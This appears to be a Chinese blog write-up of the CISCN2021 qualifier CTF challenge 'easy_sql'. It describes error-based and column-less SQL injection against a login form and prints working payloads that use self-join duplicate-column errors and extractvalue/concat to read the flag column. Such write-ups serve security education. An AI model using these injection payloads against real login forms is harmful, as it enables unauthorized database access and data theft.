[CISCN2021 Quals]easy_sql

easy_SQL

界面无回显,1’有回显1’'可以绕过。
抓包,sqlmap跑了一下,库security表users字段id,username,password.但没有用。
看了一下,是报错注入,手注了了一下。
首先看fuzz检测一下过滤了什么在这里插入图片描述
前四个都过滤掉了。
在这里插入图片描述
库名可以报错注入出来,但是由于from(information_schema.columns)where(table_name)被过滤了。
不能继续使用extractvalue爆表名字。换一种姿势。
无列名注入。
http://www.wupco.cn/?p=4117

uname=' and (select * from (select * from users as a join users as b) as c)or'&passwd=1&Submit=%E7%99%BB%E5%BD%95

在这里插入图片描述
原理是在使用别名的时候join把表扩充成两份,在最后别名c的时候查询到重复字段,就成功报错。并且我们输入错误的表名字也会提示我们错误。
在这里插入图片描述
于是我尝试了CISCN,ciscn_flag,ciscn,flags,flag_ciscn,flag。
flag成功回显。
在这里插入图片描述
使用using函数查看其他表。
在这里插入图片描述
直接使用报错函数读取字段即可。
但由于flag过长需要使用left和right函数分别查看。
这里说一下带有-并不是纯数字的字段名,`` 可以使用这个符号来查询。

payload:uname=' and (extractvalue(1,concat(0x7e,(select(left(`811262b2-2204-49d3-9994-68199fc5dc35`,30))from(flag)),0x7e)))or'&passwd=1&Submit=%E7%99%BB%E5%BD%95
payload:uname=' and (extractvalue(1,concat(0x7e,(select(right(`811262b2-2204-49d3-9994-68199fc5dc35`,30))from(flag)),0x7e)))or'&passwd=1&Submit=%E7%99%BB%E5%BD%95

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值